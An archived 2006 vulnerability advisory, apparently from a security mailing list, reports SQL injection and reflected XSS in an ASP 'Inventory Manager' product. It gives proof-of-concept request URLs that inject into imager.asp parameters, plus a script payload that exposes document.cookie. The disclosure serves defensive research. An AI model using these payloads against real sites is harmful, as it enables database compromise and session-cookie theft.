Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src / Print Next >>

Date: 14 Nov 2006 13:50:22 -0000
From: [email protected]
To: [email protected]
Subject: Inventory Manager [injection sql & xss (get)]
X-Virus-Scanned: antivirus-gw at tyumen.ru

vendor site:http://www.websitedesignsforless.com/
product:Inventory Manager
bug:injection sql & xss (get)
risk:medium

injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&picfield=photo&where='[sql]


xss get :
http://site.com/inventory/inventory/display/display_results.asp?category=</textarea>'"><script>alert(document.cookie)</script>



laurent gaffiИ & benjamin mossИ
http://s-a-p.ca/
contact: [email protected]

<< Previous INDEX Search src / Print Next >>

Партнёры:

Хостинг: